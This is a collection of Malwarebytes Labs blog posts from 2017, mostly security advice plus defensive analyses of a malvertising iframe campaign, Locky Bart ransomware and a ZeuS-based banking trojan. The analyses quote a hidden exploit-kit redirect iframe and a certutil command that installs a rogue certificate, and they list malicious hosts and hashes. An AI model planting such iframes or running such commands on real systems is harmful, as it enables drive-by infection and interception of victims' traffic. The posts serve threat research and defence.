# Techie Feeds

### A week in security (Jan 30th – Feb 5th)

Malwarebytes - Tue, 02/07/2017 - 20:13

Last week, we took a look at the theories behind preventing users from clicking everything (don’t worry, you’re allowed to click that), a deep dive into Locky Bart Ransomware, and a long term drive-by download campaign. We also explored why you should care about data breaches and also released our 2016 State of Malware Report.

Elsewhere from the last week:

Stay safe, everyone!

The Malwarebytes Lab

Categories: Techie Feeds

### Wi-Fi Security 101

Malwarebytes - Tue, 02/07/2017 - 18:00

For anyone that travels, uses their phone in public, or stays constantly connected to the internet anywhere they go—which probably means you, Wi-Fi security should be a top priority. This day in age, we use wireless internet connection anywhere we can find, but often times, don’t think about the dangers of jumping on a public network and getting hacked. The term “hack” and “data breach” seem to be more common than ever, in the news and media—and there’s a reason for that. The increase of mobile device usage and connected technologies everywhere have been a blessing and a new curse because it has indirectly made your information and devices more susceptible. Here’s the 101 on Wi-Fi security and what you can do to keep the personal information stored on your mobile devices, well, personal.

1. Free doesn’t mean safe.

Just because Wi-Fi is free, doesn’t mean you’re in the clear for potential security breaches. Know that even if you have to log in with a password, likely provided by the establishment you’re in, it doesn’t mean your online activities are encrypted. Also beware of random Wi-Fi hotspots or free Wi-Fi networks that appear to be open to join. These could be made by hackers themselves as a way take advantage of those who aren’t careful and join.

2. Don’t be a victim.

It’s inevitable that you will use a public network to connect to the internet at some point in time. This is especially the case when you travel and need to do work in a public setting such as an airport, coffee shop, or hotel. While you can take advantage of this public connection, do take precaution as to what kind of activity you choose to do on your laptop, tablet, or smartphone. Avoid going on sites that hold private, sensitive information like bank accounts. The last thing you want is to have your savings account drained because you decided to open up your banking app and expose how much money you have over a public network.

3. Practice public safety.

If you are on a public Wi-Fi network, make sure all the sites you’re browsing start with HTTPS and not HTTP. Traffic on websites beginning with HTTP is visible to hackers, so avoid putting yourself in that scenario all together. Additionally, you can change your wireless settings so that they do not automatically connect to available Wi-Fi. By doing this, you prevent unintentionally putting your mobile activity out in the public and your information at risk.

As for your own Wi-Fi network, there are some key actions you can take to help secure it. Change the default SSID on your wireless internet network and create a strong password as an added security measure—avoid including words from the dictionary. Hackers have access to precomputed tables of common SSIDs and passwords, so this helps to stop them from cracking the code.

5. Get an alternative.

It may be hard to resist the free public Wi-Fi, but if you can afford it and see the value in Wi-Fi security protection, then get yourself a personal hotspot. Mobile network providers like T-Mobile offer various options with generous data plans that make the investment worth it. When you set up your Wi-Fi hotspot, still take the same precautions as you would for your home network, like changing the defaults for added security. If a hotspot is not an option for you, then check to see if the company you work for has a Virtual Private Network (VPN). These are secure networks and definitely beat out public networks and subjecting yourself to hackers when you’re just trying to do work outside the office.

It’s a rough cyber world out there, but you can survive it. By being aware of Wi-Fi security and taking the right measures you can keep your devices and private information safe and surf the internet as you please.

Jessica Oaks

@TechyJessy

Categories: Techie Feeds

### Celebrate Safer Internet Day

Malwarebytes - Tue, 02/07/2017 - 14:00

Safer Internet Day is an awareness-raising campaign that started in Europe more than a decade ago. Hosted by ConnectSafely.org, Safer Internet Day gained official recognition in the US in late 2012, with a joint agreement between the Department of Homeland Security and the European Commission to work together to build a better Internet for young people. Now, it is celebrated in more than 100 countries worldwide.

The theme for this year’s Safer Internet Day celebration is “Be the change: Unite for a better Internet.” Organizers are looking for people to post about positive social actions online—whether it’s a random act of kindness or a full-on flash mob. Here are some ways you can participate:

1. Join the Safer Internet Day live stream in Philadelphia at 9:30 a.m. EST to watch youth leaders, educators, policy makers, Internet safety experts, and tech executives discuss ways to make the Internet a better place.
2. Join Malwarebytes researchers for a live Twitter chat today from 11:00 to 11:30 a.m. PT for tips on Internet safety. Be sure to follow @Malwarebytes and use the hashtag #AskMBL to submit questions.
3. Share good deeds on social media—what’s one good thing you’ve done for the Internet or the world (with the Internet’s help)? Use the hashtags #SaferInternetDay and #SID2017.
4. Use lesson plans developed by ConnectSafely for elementary and middle school classrooms to talk about what it means to be a responsible digital citizen.
5. Follow @connectsafely on Twitter or like their Facebook page to keep up with the latest news on Safer Internet Day.

In the meantime, bone up on security basics to stay safe online today—and every day. Here are a few starter articles that can help you remain malware-free in 2017.

How to tell if you’re infected with malware

10 easy steps to clean your infected computer

10 easy ways to prevent malware infection

Now get out there and be safe!

Categories: Techie Feeds

### 2016 State of Malware Report

Malwarebytes - Fri, 02/03/2017 - 16:00

2016 was the year that reminded us how important prevention is, no matter what type of user you may be. Indeed ransomware dominated the threat landscape and was heavily distributed via phishing emails, compromised websites, or malicious ads. With such a threat that encrypts your valuable data, there is often times very little you can do after the fact.

To give you an idea of how fast ransomware progressed, we saw a 267 percent increase between January 2016 and November 2016, with over 400 different variants in total. The most impacted users were businesses, possibly correlated with the increase in malicious spam during the same time period. Several large botnets were used to send phishing emails containing Office documents or scripts purporting to be invoices or other such lure.

This was another observation we made with the return of old fashioned infection techniques such as VBA Macros and a flurry of scripting languages (JavaScript, VBScript, etc) which took many in the security industry by surprise. The most interesting ones are the Word or Excel booby trapped files because they truly mix in with genuine files any company typically sends and receives each day.

While malware authors mostly relied on ransomware to make the bulk of their revenues, we noted an increase in ad fraud as well. Malware infested computers that visit websites and click on ads within a hidden desktop are responsible for billions of dollars in losses for advertisers. But they are also a threat to end users as they can also get infected with other types of malware as a result of this browsing activity.

Botnets continued to become a huge threat, not only as spam machines like mentioned earlier but also to launch severe Distributed Denial of Service attacks that impact large portions of the Internet. While traditional PCs continue to be used as bots, internet enabled devices, also known as IoT, were a low hanging fruit threat actors went after. Security cameras, routers, and many other internet connected devices are often poorly secured with default passwords or security flaws that will rarely ever get patched by their owners. Those same devices were used to take down other websites and wreak havoc across the internet.

Mobile malware keeps on evolving with better anti AV tricks while end users continue to get infected mostly by downloading free apps from non authorized stores. Brazil, Indonesia, the Philippines, and Mexico were some of the top countries affected by mobile malware.

In 2017 we can only expect ransomware to become more aggressive and have a direct impact on our lives as healthcare facilities or critical infrastructure are affected. Unless there are major laws forcing manufacturers to make IoT devices more secure out of the box, we can expect the size of such botnets to grow bigger and pose an even more dire threat to the internet.

2017 will also be the year where we see whether exploit kits will finally return as the top infection method but we can only expect spam campaigns to remain strong and steady especially against small and medium businesses, while larger organizations may also get targeted more frequently via clever phishing attacks.

Categories: Techie Feeds

### Why do I care about someone else’s data breach?

Malwarebytes - Wed, 02/01/2017 - 16:00

Because as the size of your organization increases, the probability that an individual employee’s company email is in that breach rises to 1. That lone employee is going to be suffering some unfortunate impacts, from identity theft, financial scams, blackmail, and even death threats (as seen in the Ashley Madison breach). There’s an organizational impact as well: a single compromised account can serve as a launching point for reconnaissance, phishing waves, or a pivot point for a further attack. But wait? What if the exposure is a company webmail that is isolated from the main corporate network? There will be an employee who reuses their password. But what if your company has a policy against that? Then there will definitely be employees who reuse their passwords. Unless your organization uses password managers, a single breached account has a very good chance of being a pivot point for more serious attacks.

Email isn’t the end of sensitive data loss, unfortunately. Stack Overflow, a perennial favorite for developers working out knotty problems, frequently has proprietary code cut and pasted into the site, sometimes with network configuration data attached. Pastebin can and does have network details and code with misconfigured expiration dates, waiting to be scooped up. And LinkedIn is an absolute goldmine for mapping potential accesses to employees. So how do you go about plugging leaks? A three-point strategy can get you started.

1. Legal – This is most important for an internal data protection policy because there are some hard limits to what you can and cannot tell employees to post online. Consulting with an attorney can set some appropriate bounds for what sort of mitigations you want to implement. Further, a lawyer well briefed on cyber threats can be a valuable asset in issuing takedowns of offending material.

2. Stovepipe breaking – Communicating directly with first line managers to discover how and why data leaves your organization should constitute the bulk of any data loss mitigation plan. With the exception of the lone knucklehead who signs up for an inappropriate site with a company email (you have one of these, I promise) most data loss occurs because businesses use cases do not align to existing security policy, and users are going to find a workaround. Does your default computing environment have tooling sufficient for developers to do their job or are you 2 versions behind industry standards? How does your security team get a piece of malware off an infected host and onto a test machine? What’s the default attachment size on the corporate mail instance? And if you run on a virtualized environment, what’s the default memory allocation and how much hassle does an employee have to suffer to get it raised? These may appear on the surface to be small, too in-the-weeds type questions. They are in fact very predictable preludes to data loss or a full on breach, because in each instance an employee is incentivized to break policy to get their job done. This is fortunately preventable – talk to your first line management and gather use cases, before policy gets set.

3. SOC feedback – Last but also important is to have your security team aware of company data when it lands in public view. This doesn’t have to be onerous or time consuming; simple crawlers with a list of vetted keywords and domains run as a cron job can go a long way towards finding data where it shouldn’t be. Of course the best case scenario is to prevent leaks before they happen, but swift detection and takedowns (remember you spoke to your lawyer?) can mitigate damage.

3rd party data breaches are happening at an accelerating pace and show no signs of abating. Secondary effects of these breaches tend to spread tendrils of insecurity much further than the individual site in question. Take some time now to talk to managers, your legal department, and your SOC now, and you can make sure that the next breach won’t be catastrophic for you as well.

Categories: Techie Feeds

### A look back at the Zyns iframer campaign

Malwarebytes - Tue, 01/31/2017 - 18:01

We often get asked about drive-by download attacks, how they work, and specifically about what sites people may have visited just prior to getting infected. This is an interesting aspect when tracking campaigns and what they lead to.

Typically, one can divide the drive-by landscape into two categories: malvertising and compromised websites. The former involves legitimate websites that rely on advertising as their source of revenue. Crooks have long been able to insert themselves into the ad delivery chain in order to push malicious code such that the simple fact of viewing a page with ads actually infects your computer. The latter is made of websites that have been hacked and injected with malicious code and are also used to redirect users to malicious content.

What we refer to as “campaigns” are specific attributes from the same threat actor or group similar to what is used to categorize malware families. There are many different campaigns for both streams, some come and go while others stick around for long periods of time. For instance, EItest is one particular campaign for compromised sites which has been going on for years.

Campaigns are an essential part of the underground ecosystem because they continuously feed potential new victims into the infection funnel which ultimately translates into revenues for online criminals.

Today we are taking a look at an iframe campaign (Zyns iframer) that has been going on since at least 2014. There are specific indicators of compromise (IOCs) that haven’t really changed over time and the underlying structure has also remained pretty similar. We have seen this attack chain primarily associated with malvertising, and in particular via adult sites. During its course, we noted several different exploit kits being pushed by this campaign (Angler EK, Nuclear Pack, Neutrino EK, RIG EK).

Patterns (IOCs)

The redirection infrastructure had very distinct patterns and also shared many of the same server IP addresses over time. We also saw the evolution from dynamic DNS (via sub domains) to domains on dubious top-level domains (TLDs).

URL patterns:

HTTP/1.1 200 OK Server: Apache/2.2.22 (@RELEASE@) X-Powered-By: PHP/5.3.3

Redirection URL:

<iframe src="[EK URL HERE]" width="468" height="60" style="position:absolute;left:-10000px;"></iframe> First spotted, 2014

Our earliest records are from the fall of 2014 with malvertising attacks mostly affecting Russian users. A capture from later that year shows a drive-by download from blogspot.ru via JetSwap, an “Active Promotion System!” where members and advertisers are linked together via an affiliate program. In this particular case, the advert loads a malicious iframe to qera.zyns.com which performs a 302 redirect to another domain qzertyu.myz.info and in turn redirects to the Angler exploit kit.

2014-2015 transition

The campaign kept going as 2015 rolled in with an almost identical structure. Note the addition of ‘link.php’ to the domain in charge of loading iframes to EK. Angler wasn’t the only exploit kit used by these actors. For example we see Nuclear Pack below:

Sucuri Labs post shows another .wha.la domain involved in redirect:

176.122.88.120 kophon.wha.la/out.php?sid=1

A piece of code containing the same iframe redirection structure was posted in May 2015 to an online PHP editor. It shows a distinct URL pattern for the RIG exploit kit (RIG EK version 3).

2016

2016 was an interesting year for exploit kits with the disappearance of Angler EK in June. The capture shown below is one of the latest artifacts we have from Angler EK before it went missing.

As we know, criminals transitioned to Neutrino EK after Angler EK went down. During the next few months, up until sometime in September there was a mix of both Neutrino EK and RIG EK used by the actors behind this campaign. Below, Neutrino EK in July:

The campaign was spotted in late June by Malekal (link) via malvertising on adult sites (with Gootkit mentioned as the payload).

Malware Traffic Analysis wrote a blog entry shortly after (link):

93.36.35.39 port 80 - glamgirltube.tk - GET /engine/classes/js/jquery.js - file with injected script 193.36.35.39 port 80 - fijir0.tk - GET /linkx.php - gate 46.30.46.40 port 80 - jy.neutralarbitrations.com - RIG EK

193.36.35.39 – relaxtube.tk – GET /engine/classes/js/jquery.js – Rig EK REDIRECT 193.36.35.39 – waferako.cf – GET /linkx.php – Rig EK REDIRECT 46.30.46.128 – ds.pacificbeachcar.comRig EK LANDING PAGE

RIG EK (also known as RIG Standard), seen in September:

In early December, we noticed a slight change with a new domain used as a redirector. At the same time, there were several instances where two different RIG EKs were pushed from the same redirection chain, leading to two different malware payloads.

2017

In January we started seeing the same redirector that had been pushing this campaign switch to a different chain, this time via compromised sites. This was interesting because throughout December, we were seeing the usual sequence of events with the standard iframe, even though this chain came via a different sid (sid 3) than the typical sid 1.

December 2016 (with sid=3)

Come January and we have a completely new pattern where an iframe is now inserted via a double chain of events, most notably malicious code injection that looked new to me within a WordPress plugin called Contact Form 7.

January 2017 (also with sid=3)

In January, several different trails we were tracking began to disappear, showing that the Zyns iframer campaign was likely evolving or got merged into something else. The diversity of payloads and exploit kits may indicate there was no particular tie with any specific malware distributor.

Threat actors will buy traffic from various sources to push malware, with malvertising often being the top choice for its wide impact. This particular case is a mix of malvertising and bogus adult websites aimed at driving a lot of users into exploit kit landing pages.

To protect yourself against drive-by download attacks, the first thing to do is to ensure that your computer is fully up-to-date. Use Malwarebytes to stay safe from malicious websites and thwart exploits (known and unknown) before they launch their payload.

IOCs

Dec 2014

• 88.201.248.164
• qera.zyns.com/out.php?sid=1
• qzertyu.myz.info/

July 2015

• 88.201.248.164

June 2016

• 193.36.35.39
• axas.ga/out.php?sid=1

July 2016

• 193.36.35.39
• mohugerlo.sexxxy.biz/

September 2016

• 193.36.35.39
• agebuho.club/
• korusha.tech/out.php?sid=1

December 2016

• 193.36.35.129
• tohgoo.tech/

Malware hashes:

40926512103ef629337b9c05c6682ae9fe59ef0cbdce399a50b7e64790cea786
bbf63e84c6d0b842117ea6aa3422df25b0e52517b70fe1b2b2be245d5e4c6064
fef58646be683c3c2990bfca02e133b8bc9a1339e9fc5e9768a93d737a603858
22692598cd60b20d1169d173f987bca08ee56ee0f6a33cd22760ebc6b1f1e7ff
382dcdceaa3278ba9e15cb047cf10f9d4541873fd3332a90cdb1921131e2c6ec
026b8a9e55aede3b009cd61e9bb8b47827f991789e64d1e1841c8cf39163caeb
d9b46bf0f43fcbe49645483fc29cf51da67bd583533e7afc9e6aafab87d09e24
76293214c1712a7664f43ffb741c605c041be7c8952b734f5c10b1e2f8834cd9
6798a10f94ed257d3b94816c6236122f665310b422be0a5717471d5de840125b

Categories: Techie Feeds

### Locky Bart ransomware and backend server analysis

Malwarebytes - Tue, 01/31/2017 - 16:00

In this post we will cover the Locky Bart ransomware. The developers of Locky Bart already had 2 very successful ransomware campaigns running called “Locky” and “Locky v2”. After some users reported being infected with Locky Bart, we investigated it to find the differences as to gain greater knowledge and understanding of this new version.

The Locky Bart ransomware has new features that are different from its predecessors. It can encrypt a machine without any connection to the Internet. It also has a much faster encryption mechanism.

Our research would also indicate that the backend infrastructure of Locky Bart might be maintained by a different threat actor than the original versions. While the internals of the malicious binary share a great number of similarities, there were some notable differences.

These included: Comments in the code of the application, but more notably the kind of software used in the backend server.

This did not come as a surprise, as cyber-criminals are known to share, rent, sell, and even steal malicious code from one another.

Analysis of Locky Bart’s binary

In their previous incarnations, Locky and Locky v2 used a simpler encryption process. They enumerated the files targeted for encryption, placed each in a password protected ZIP archive, and repeated this process until all the files were encrypted. The creators did not use the AES ZIP protection, but an older algorithm, and because of this, researchers were able to make a decrypting application.

Locky Bart performs a fairly straight forward set of actions to encrypt the victim’s files. They are as follows:

• Wipe System Restore Points with VSSadmin.
• Generate a seed to create a key to encrypt user’s files.
• Enumerate the files it wants to encrypt, skipping certain folders to speed it up.
• Encrypt the enumerated files with the generated key.
• Encrypt the key used to encrypt the files with a master Kkey, which now becomes the victim’s “UID” used to identify them.
• Create a ransom note on the desktop with a link to a payment page and their “UID”.

The function used to generate a seed, which is used to create a key to encrypt the files with. It uses variables like system time, process ID, thread ID, Process Alive Time, and CPU ticks to generate a random number.

The function used to enumerate and encrypt the files.

Bart will skip any folders with these strings in them.

The file-types that Bart targets to encrypt.

The string that Bart uses to make a Ransom Note. The “khh5cmzh5q7yp7th.onion” is the payment server, and the “AnOh/Cz9MMLiZMS9k/8huVvEbF6cg1TklaAQBLADaGiV” is a sample UID that would be sent with the URL to the server for the victim to make a payment. Remember that the UID is only an encrypted version of the key that can be used to decrypt a victim’s files.

How the creators of Bart Locky acquire the key is what differentiates this version from its predecessors. When the victim of the ransomware visits the URL to make their payment for the ransom, they are unknowingly sending their decryption key to the criminals.

Let’s break down the process in a more granular method, to better understand it.

• Bart Locky gathers information on the victim’s machine to create an encryption key.
• Bart Locky encrypts the user’s files using the seeded key created in the previous step.
• Bart Locky then encrypts the key that was used for the original encryption with a one way encryption mechanism, using the public key of a public / private key pair method. The private key for this second encryption resides on the malicious server and is never accessible to the victim.
• Bart Locky then generates a URL on the victim’s machine. It contains the link to a TOR cloaked .onion address where the malicious backend website is hosted. This URL has a user ID within it. This UID is the original decryption key, in encrypted form.
• The victims visits the .onion site and the malicious server harvests the encrypted UID.

This UID is useless to the victim though, because they do not have the private key to decrypt their files. However, the ransomware creator’s server does, meaning his server can not only use the UID to identify the victim, but also decipher the UID into their victim’s key upon payment of the ransom.

In the end, only the ransomware creators can decrypt the user’s files, and because of this feature, there is no need to access the malicious server to encrypt them.

Locky Bart Software Protection technique

The Bart Locky binary also uses a software protection technique. This technique is known as code virtualization and is added to Bart Locky binary by using a program called “WPProtect”.

This makes reversing the binary significantly more difficult to disassemble and complicates stepping through the code, a technique used to understand what it does. Legitimate uses of this type of software are most typically seen in anti-piracy mechanisms. An example of a commercial version of this type of software would be Themida. The author of Bart Locky probably chose this particular anti-tampering mechanism as it is free, open source, and provides many features. This adoption of software protection techniques is a troubling development. These applications, including WPProtect, make reversing and analysis significantly more challenging.

The Locky Bart server

The second half of Locky Bart is the server and backend. This server is used to provide the victims with a payment mechanism to pay the ransom.

• Receive the bitcoins used as a payment method.
• Transfer the bitcoins to other wallets.
• Generate a decryption EXE for the victims.
• Provide the victims with the decryption EXE to the victims.
• Accrue additional information on the victims.

The Bart Locky backend runs on a framework called yii. Yii is a high-performance PHP framework best for developing Web 2.0 applications.

This framework contains a wealth of information on the inner workings of Bart Locky.

TheYii debug panel that contained extensive information about the configuration server.

• Every configuration setting for all the software running on the server such as PHP, Bootstrap, Javascript, Apache (if used), Nginx (If used), ZIP, and more.
• Every request that was made to the server including their request information, header information, body, timestamp, and where they originated.
• Logs that showed every error, trace, and debug item.
• All the automated email functions.
• MYSQL Monitoring that showed every statement made and its return.

Locky Bart stores information in a MYSQL database. The credentials to the MYSQL server reside in a “Config” PHP file in the “Common” folder of the site. An example path looks like the following: /srv/common/config/main-local.php

The contents of Bart’s server MYSQL config file

The information contained in the MYSQL database consists of the victims Unique IDentifier, the encryption key, BitCoin Address, Paid Status, and Timestamps.

A small part of the table holding the ransomware information in the database.

The Locky Bart server also contains a second database that contains further information on the victims of the ransomware.

Locky Bart ransomware’s “Stats” table example.

A “ReadMe” file found on the server that seems to detail some features on the Stats database.

The Locky Bart server contains a “BTCwrapper.php” which used a “controller” method that exposes a BTC Wallet Class that all other PHP files can call. This class initiates a connection to the Bitcoin servers through a username and password. This class contained complete methods on controlling and using the main BTC wallet set up by the criminal to store all the money received. This wallet is emptied regularly. This class can create new BTC Addresses as well and had the ability to empty those wallets on payment to the main wallet. There were also methods to check on the status of payments from each victim.

Some of the functions that the BTCWrapper Class calls.

The first few functions of the BTCWrapper Class. The class uses CURL to contact a locally ran bitcoin server that communicates with the block chain.

The Locky Bart server had 2 Bitcoin addresses where victims’ payments were transferred to. The current one:

The current BTC address associated with Locky Bart has accumulated $7,671.60 in its life time. And a second one, that was referenced in PHP configurations on the malicious server. An older BTC address also associated with Locky Bart had accumulated$ 457,806.06.

The server portion of this ransomware was configured to function very similar to a legitimate business. It mirrored a “Support Ticket Department” where the user could contact the ransomware support for any issues they may have experienced.

The process was completely automated. The user would get infected and visit the site as their ransom note instructed. When they visited the site, the server would then generate their unique BTC address and present it to them automatically.

After this, if the user made the decision to pay the ransom, but if they had any questions, they could literally contact support.

If they did indeed make the decision to pay, they would proceed to buy Bitcoins through the many methods available (BTC ATM, LocalBitcoins – which allows you to meet people local to trade BTC for money or use banks and wiring like Western Union, or buy them with a credit card online).

Once the user has the amount specified by the ransomware in their own BTC Wallet, they would then transfer the money from their wallet to the Payment Address the Ransomware Payment Page generated for them.

The Ransomware Server checks every few minutes if a payment has been made for any of its victims and if the payment had been confirmed. Once the server verifies a payment they mark that victim in the Database as “Paid”.

When a victim is marked as “Paid” the server then generates a “Decryption Tool EXE” and writes the users Encryption Key in the binary of that exe, and presents a link to download it on the personal payment page of the victim. Later when the victim checks their payment page again, they will see the link, download the tool, and decrypt their files.

The generation of the victim’s decryption tool on the fly.

Conclusion

This research into Locky Bart ransomware gives a great view of the side of a ransomware operation that we typically do not get to see, the backend. The criminals who run these operations do so on an extremely professional level, and users should always take an extra step in protecting themselves from these types of attacks.

Ransomware will continue to grow and get more advanced and users need to make sure they are protected in the form of backup’s, security application protection like Malwarebytes, and make sure they have some type of anti-ransomware technology protecting them from these advanced attacks. Users running Malwarebytes already have protection from ransomware, as Malwarebytes is equipped with our anti-ransomware technology.

Categories: Techie Feeds

### How do I get my employees to stop clicking on everything?

Malwarebytes - Mon, 01/30/2017 - 22:19

If you’ve been given responsibility for network security in a non-technical area of the business, there’s one eternal question that has been bedeviling admins for decades. Shelves of words have been spilled on the subject, to limited result.

How do I get the user to stop clicking everything?

Everyone with cybersecurity responsibilities has their own crop of horror stories where an intransigent user has clicked furiously on a Dridex installer, wondering why their “invoice” won’t load.  A user might enable macros to see the “important notice”, scratch their head at the display issues, then open the document on another machine because theirs obviously had issues. A more recent corollary is the user who gets an email from the “CEO”, and subsequently starts a wire transfer to a dodgy address in Asia without following up with anyone. These are problems that have been appearing in almost every organization, for years. So what is wrong with these people and how do we fix it?

Lets call this the BOFH theory, as it’s most commonly used by people in security to explain why we shouldn’t have to do anything about phishing, because it’s forever unsolvable. The user, an ignorant, benighted soul, is incapable of looking up from their daily toil to enlighten themselves on security issues. One can never expect a marketing exec to reach our levels of security sophistication, and as such, it’s foolish to attempt to uplift them. This is wrong and counter productive, on several levels.

First is the Ned Flanders’ Parents Corrollary: “We’ve tried nothing and we’re all out of answers!” Those of us working these issues on a daily basis rarely, if ever have conversations with business profit centers on their terms. We have a tendency to shower users with a barrage of horrible outcomes if they click a phish, up to and including compromise of the entire production network.  While true-ish, when you take this approach to almost every potential threat, an average user will immediately tune you out as a hysterical Chicken Little. And they’re not necessarily wrong. The most common outcome for a phish derived compromise on a properly configured network is a reimage of the impacted host followed by a SOC investigation and report to the CISO. While irritating and time consuming, it is not a catastrophe. A much more productive approach is to explain to the user the downtime associated with a reimage and the fiscal cost to the business.  (Depending on the org, up to 16 lost working hours for the impacted user, and more for the SOC.)

The kinder, gentler version of the Bad User theory is phishing education. People simply don’t know what a phish looks like and what it can do, and it is incumbent upon us to teach them, and then phishing will be solved forever. There are three problems with this.

1. It assumes that the user never has a good reason to click on a message that appears slightly off.
2. It assumes a security savvy user/admin wouldn’t click on a phish. Various APT groups have enjoyed great success proving otherwise. If you think you are not susceptible to this, it’s you – you are the security vulnerability.
3. Email Fatigue erodes your judgement
4. Phishing education courses are terrible. I mean really, look at this:

Some folks realize that attributing unwanted user behavior to mass, contagious, intractable idiocy is counter-productive, usually wrong, and poisons relationships between security and the rest of the company. These people will tell you it is not the user’s fault for clicking, per se, it is the company’s fault for incentivizing bad actions. This is closer to true, as organizational incentives do strongly predict individual outcomes, but can still be problematic.

On the true side, some companies like to deluge employees with emails that look like phishes. It’s not uncommon for users to receive corporate emails full of HTML, an urgent call to action, followed by a link to an internet network resource. If this sounds familiar to you, it’s not really a mystery why your users would click on a phish.

On the “Yes, but” side, phishes have more than one lure. For every phish that looks like a legitimate request to update your corporate phonebook entry, there’s one where the ‘CEO’ is asking the user to Western Union money to Vietnam, or offer a ‘corporate discount’ after filling out a survey. The issue here is less learned email helplessness, and more a security culture that doesn’t treat users as partners. A healthy SOC does not scold users for misbehavior, it enlists users as foot soldiers to ferret out malicious indicators that would otherwise go under the weather. There is precious little that makes a non-technical user more proud than to be able to present a new threat to the professionals for disposition. Give your users reasons to have pride in themselves and they will jump at the chance to be helpful.

Theory 3: Driving a nail with a platypus

Why is phishing an intractable problem? Because…

Organizational issues require organizational solutions

There is no patch, update, conversion, or SIEM that will in the slightest bit impact human behavior, but that doesn’t seem to stop folks from trying. Users click phishes and will continue to do so because they are incentivized to view clicking as a rational act.  Some questions to ask before looking to a technical solution for phishing:

1. Does the business pass around document files for frequent, multiuser revisions? Consider a cloud based document editing solution, or even version control software. No one can click on the malicious attachment that isn’t being sent.
2. How closely do your intra-company communications resemble phishes? What is the penalty suffered by ignoring them? A chat between security and company communications can go a long way towards teaching better email hygiene.
3. Are you afraid of your CEO? Business Email Compromise is a very lucrative scam that relies on recipients of the phish being too intimidated to question an email from someone they believe to be their boss.

The common thread to these possible solutions is that they are cheap or free, and you can already implement those that rely on internal resources. Before you spend money engineering a non-engineering problem, it might be more productive to put the platypus down and ask “Why wouldn’t someone click that?”.

Categories: Techie Feeds

### Zbot with legitimate applications on board

Malwarebytes - Thu, 01/26/2017 - 19:24

Source code of the infamous ZeuS malware leaked in 2011. Since that time, many cybercriminals has adopted it and augmented with their own ideas. Recently, among the payloads delivered by exploit kits, we often find Terdot.A/Zloader – a downloader installing on the victim machine a ZeuS-based malware.

The payload is very similar to the malware described in this article and referenced under the name Sphinx. However, after consulting with other researchers (special thanks to ), we got proven that the bot that is sold as Sphinx is very different (sample). Since there are many confusions about the naming, we decided to stick to the name Terdot Zloader/Zbot.

In this post we will have a look at the features and internals of this malware. As we will see, the dropped package consists not only of malicious files –  but also legitimate applications, used for the malicious purpose.

Analyzed sample

950368afb934fd3fd5b2d4e6704b757b – original executable #2

fca092aca679edd9564d00e9640f939d – original executable #3

Distribution

Most of the analyzed samples were dropped from   – some of the campaigns are described in details here: 28 Dec 2016 , 6 Jan 2017, and 18 Jan 2017. However, we also encountered cases when the Terdot.A/Zloader was dropped by the malicious email attachment.

Behavioral analysis

After the sample is run, we can see it deploying explorer and then terminating. It is easy to guess, that it injected some malicious modules there.

If we attach a debugger into the explorer process, we can see the injected shellcode, along with a new PE file (payload.dll). The interesting and unusual thing, typical for this Zloader is, that the DLL does not start at the beginning of the memory page, but after the shellcode:

If we have an internet connection, the Zloader will load the second stage (the main bot) and inject it into msiexec.exe.

The injected module beacons to the CnC and downloads other modules. Observed patterns of the gates:

/FE8hVs3/gs98h.php /bdk/gate.php

The communication is encrypted:

CnC responds with a new PE file – the module of the malware: (client32.dll). Downloader decrypts it in the memory and injects further: after a while we can see the explorer terminating and another program being deployed: msiexec. The initial malware executable is deleted.

Attaching debugger to msiexec, we can find the Zbot (client32.dll) implanted and running in the process space.

From inside of the injected module another internet connection is made, and some new elements are being downloaded and dropped (including legitimate applications like certutil and php – their role will be described further). The same client32.dll is also injected in browsers.

The module deployed inside msiexec.exe is used as a supervisor. It opens TCP sockets locally and communicates with the modules injected in browsers, in order to monitor opened pages.

MitM

The main module of the bot downloads and drops some new elements into the %TEMP% folder. Surprisingly, those files are non-malware. We can see the certutil application (0c6b43c9602f4d5ac9dcf907103447c4) along with it’s dependencies – legitimate DLLs.

In the same folder, there is also some alien certificate (filename, as well as the name of the issuer is randomly generated).

The certificate is installed with the help of the certutil, for the purpose of Man-in-the-Middle attacks (in this case they are also called Man-in-the-browser).

Example – a command line deployed during tests:

"C:\Users\tester\AppData\Local\Temp\certutil.exe" -A -n "otdarufyr" -t "C,C,C" -i "C:\Users\tester\AppData\Local\Temp\nedea.crt" -d "C:\Users\tester\AppData\Roaming\Mozilla\Firefox\Profiles\be7dt337.default"

It is easy to guess that this malware targets web browsers. Indeed, if we run a browser and try to visit some site over HTTPS, we will see that the original certificates are replaced by the malicious one. See examples below – draw attention that the subject of the certificate contains the valid domain – only the issuer field can let us recognize, that the certificate is not legitimate:

Satander MiTB on Firefox:

The browser claims that the connection  is secure – but when we see the details, we can find, that the connection is “protected” by the fake certificate dropped by the malware:

Browsers do not alert about any inconsistency – and the user who was not vigilant enough to check the details of the certificate, may easily get deceived…

If we attach a debbugger into the running browser, we can see that the same client32.dll is injected there – along with some more code used for API redirections.

Persistence

In addition to the content dropped in %TEMP%, we can see some new folders with random names created in %APPDATA%:

Interesting fact is that one of them contains legitimate php.exe (see on VirusTotal: php.exe, php5ts.dll).

…and some obfuscated php code:

.gist table { margin-bottom: 0; }

(Formatted version here).

Other folders contains some encrypted data, i.e.:

Interestingly, this php package is referenced at autostart:

Link deploys the dropped php application and runs the script, that we saw before:

We can easily suspect that this is a method of persistence. Deobfuscating the PHP code confirms this guess. See the same code after cleanup:

.gist table { margin-bottom: 0; }

As we can notice, the file royxh.umh contains encrypted code of the malware. Using the presented PHP script it is decrypted back into the Zloader executable:

fca092aca679edd9564d00e9640f939d

The dropped file is run and then deleted.

This element – unpacked from the initial sample and injected into explorer.exe – is a downloader – identified as Terdot.A/Zloader. It is responsible for connecting with the CnC and downloading the main malicious module, that is the Zbot.

Zbot – client32.dll

The second stage is also a DLL – this time it is injected into msiexec.exe as well as into browsers:

Attacked targets

The bot injects itself into the most popular browsers, in order to hook their API:

It excludes from the attack computers with Russian language installed – but instead of doing it silently, like most of the malware – it is very openly announcing this fact:

The SQL part

Inside the bot we can find references to an SQL release from the end of 2016 (see SQLite Release 3.15.1 On 2016-11-04):

2016-11-04 12:08:49 1136863c76576110e710dd5d69ab6bf347c65e36

Presence of those references confirms, that the bot is pretty new, and probably under active development.

We can also see many SQL queries and related error messages among the strings:

They are used to read and manipulate browser cookies, that are stored in form of SQLite databases.

Queries deployed:

Man-in-the-Browser

The main module injected into msiexec opens local TCP sockets that are used to communicate with the module injected into browser.

All the communication between the browser and particular website is first bypassed by client32.dll injected into msiexec.

Like many Zbots, Terdot not only spy but also allows to modify the displayed content, by “WebInjects” and “WebFakes”.

